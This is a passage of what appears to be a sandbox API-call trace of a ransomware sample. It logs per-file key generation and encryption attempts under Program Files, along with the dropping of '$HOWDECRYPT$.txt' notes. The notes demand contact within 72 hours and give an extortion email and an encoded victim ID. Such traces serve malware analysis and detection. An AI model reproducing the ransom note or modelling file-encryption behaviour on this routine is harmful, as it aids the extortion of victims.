hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb21d8 | out: hHeap=0x2c0000) returned 1 [0162.285] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce778 | out: pbBuffer=0x25ce778) returned 1 [0162.286] GetProcessHeap () returned 0x2c0000 [0162.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce770*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce770*=0x30) returned 1 [0162.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.286] GetProcessHeap () returned 0x2c0000 [0162.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.286] GetProcessHeap () returned 0x2c0000 [0162.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ebe8 | out: hHeap=0x2c0000) returned 1 [0162.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.287] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.287] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6a7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7d0, lpOverlapped=0x0 | out: lpBuffer=0x25ce6a7*, lpNumberOfBytesWritten=0x25ce7d0*=0x127, lpOverlapped=0x0) returned 1 [0162.288] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.288] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7d0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7d0*=0x2ac, lpOverlapped=0x0) returned 1 [0162.288] CloseHandle (hObject=0x178) returned 1 [0162.288] GetProcessHeap () returned 0x2c0000 [0162.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07438 | out: hHeap=0x2c0000) returned 1 [0162.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce770 | out: pbBuffer=0x25ce770) returned 1 [0162.288] GetProcessHeap () returned 0x2c0000 [0162.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.288] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce768*=0x30) returned 1 [0162.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.289] GetProcessHeap () returned 0x2c0000 [0162.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.289] GetProcessHeap () returned 0x2c0000 [0162.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c844e8 | out: hHeap=0x2c0000) returned 1 [0162.289] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce768 | out: pbBuffer=0x25ce768) returned 1 [0162.289] GetProcessHeap () returned 0x2c0000 [0162.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce760*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce760*=0x30) returned 1 [0162.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.289] GetProcessHeap () returned 0x2c0000 [0162.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8e78 | out: hHeap=0x2c0000) returned 1 [0162.290] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce768 | out: pbBuffer=0x25ce768) returned 1 [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.290] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce760*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce760*=0x30) returned 1 [0162.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84420 | out: hHeap=0x2c0000) returned 1 [0162.290] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce760 | out: pbBuffer=0x25ce760) returned 1 [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.290] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce758*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce758*=0x30) returned 1 [0162.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.290] GetProcessHeap () returned 0x2c0000 [0162.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.290] GetProcessHeap () returned 0x2c0000 [0162.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84358 | out: hHeap=0x2c0000) returned 1 [0162.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce760 | out: pbBuffer=0x25ce760) returned 1 [0162.291] GetProcessHeap () returned 0x2c0000 [0162.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.291] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce758*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce758*=0x30) returned 1 [0162.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.291] GetProcessHeap () returned 0x2c0000 [0162.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.291] GetProcessHeap () returned 0x2c0000 [0162.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07368 | out: hHeap=0x2c0000) returned 1 [0162.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce758 | out: pbBuffer=0x25ce758) returned 1 [0162.291] GetProcessHeap () returned 0x2c0000 [0162.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.291] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce750*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce750*=0x30) returned 1 [0162.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.291] GetProcessHeap () returned 0x2c0000 [0162.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.291] GetProcessHeap () returned 0x2c0000 [0162.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84290 | out: hHeap=0x2c0000) returned 1 [0162.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce758 | out: pbBuffer=0x25ce758) returned 1 [0162.292] GetProcessHeap () returned 0x2c0000 [0162.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce750*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce750*=0x30) returned 1 [0162.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.292] GetProcessHeap () returned 0x2c0000 [0162.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.292] GetProcessHeap () returned 0x2c0000 [0162.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8db8 | out: hHeap=0x2c0000) returned 1 [0162.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce750 | out: pbBuffer=0x25ce750) returned 1 [0162.292] GetProcessHeap () returned 0x2c0000 [0162.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce748*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce748*=0x30) returned 1 [0162.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.292] GetProcessHeap () returned 0x2c0000 [0162.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.292] GetProcessHeap () returned 0x2c0000 [0162.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c841c8 | out: hHeap=0x2c0000) returned 1 [0162.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce750 | out: pbBuffer=0x25ce750) returned 1 [0162.293] GetProcessHeap () returned 0x2c0000 [0162.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce748*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce748*=0x30) returned 1 [0162.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.293] GetProcessHeap () returned 0x2c0000 [0162.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.293] GetProcessHeap () returned 0x2c0000 [0162.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8cf8 | out: hHeap=0x2c0000) returned 1 [0162.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce748 | out: pbBuffer=0x25ce748) returned 1 [0162.294] GetProcessHeap () returned 0x2c0000 [0162.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce740*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce740*=0x30) returned 1 [0162.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.294] GetProcessHeap () returned 0x2c0000 [0162.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.294] GetProcessHeap () returned 0x2c0000 [0162.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6438 | out: hHeap=0x2c0000) returned 1 [0162.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce748 | out: pbBuffer=0x25ce748) returned 1 [0162.294] GetProcessHeap () returned 0x2c0000 [0162.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce740*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce740*=0x30) returned 1 [0162.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.294] GetProcessHeap () returned 0x2c0000 [0162.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.294] GetProcessHeap () returned 0x2c0000 [0162.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6370 | out: hHeap=0x2c0000) returned 1 [0162.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\visualizations\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.295] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.295] WriteFile (in: hFile=0x178, lpBuffer=0x25ce677*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce7a0, lpOverlapped=0x0 | out: lpBuffer=0x25ce677*, lpNumberOfBytesWritten=0x25ce7a0*=0x127, lpOverlapped=0x0) returned 1 [0162.296] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.296] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce7a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce7a0*=0x2ac, lpOverlapped=0x0) returned 1 [0162.297] CloseHandle (hObject=0x178) returned 1 [0162.297] GetProcessHeap () returned 0x2c0000 [0162.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeba30 | out: hHeap=0x2c0000) returned 1 [0162.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\skins\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.298] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.298] WriteFile (in: hFile=0x178, lpBuffer=0x25ce673*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce79c, lpOverlapped=0x0 | out: lpBuffer=0x25ce673*, lpNumberOfBytesWritten=0x25ce79c*=0x127, lpOverlapped=0x0) returned 1 [0162.298] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.298] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce79c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce79c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.298] CloseHandle (hObject=0x178) returned 1 [0162.299] GetProcessHeap () returned 0x2c0000 [0162.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7eb10 | out: hHeap=0x2c0000) returned 1 [0162.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce738 | out: pbBuffer=0x25ce738) returned 1 [0162.299] GetProcessHeap () returned 0x2c0000 [0162.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce730*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce730*=0x30) returned 1 [0162.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.299] GetProcessHeap () returned 0x2c0000 [0162.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.299] GetProcessHeap () returned 0x2c0000 [0162.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07298 | out: hHeap=0x2c0000) returned 1 [0162.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce738 | out: pbBuffer=0x25ce738) returned 1 [0162.299] GetProcessHeap () returned 0x2c0000 [0162.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce730*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce730*=0x30) returned 1 [0162.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.300] GetProcessHeap () returned 0x2c0000 [0162.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.300] GetProcessHeap () returned 0x2c0000 [0162.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec62a8 | out: hHeap=0x2c0000) returned 1 [0162.300] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce730 | out: pbBuffer=0x25ce730) returned 1 [0162.300] GetProcessHeap () returned 0x2c0000 [0162.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.300] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce728*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce728*=0x30) returned 1 [0162.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\practitioner.exe" (normalized: "c:\\program files (x86)\\windows media player\\practitioner.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.300] GetProcessHeap () returned 0x2c0000 [0162.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.300] GetProcessHeap () returned 0x2c0000 [0162.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e071c8 | out: hHeap=0x2c0000) returned 1 [0162.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\network sharing\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.301] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.301] WriteFile (in: hFile=0x178, lpBuffer=0x25ce663*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce78c, lpOverlapped=0x0 | out: lpBuffer=0x25ce663*, lpNumberOfBytesWritten=0x25ce78c*=0x127, lpOverlapped=0x0) returned 1 [0162.302] lstrlenA 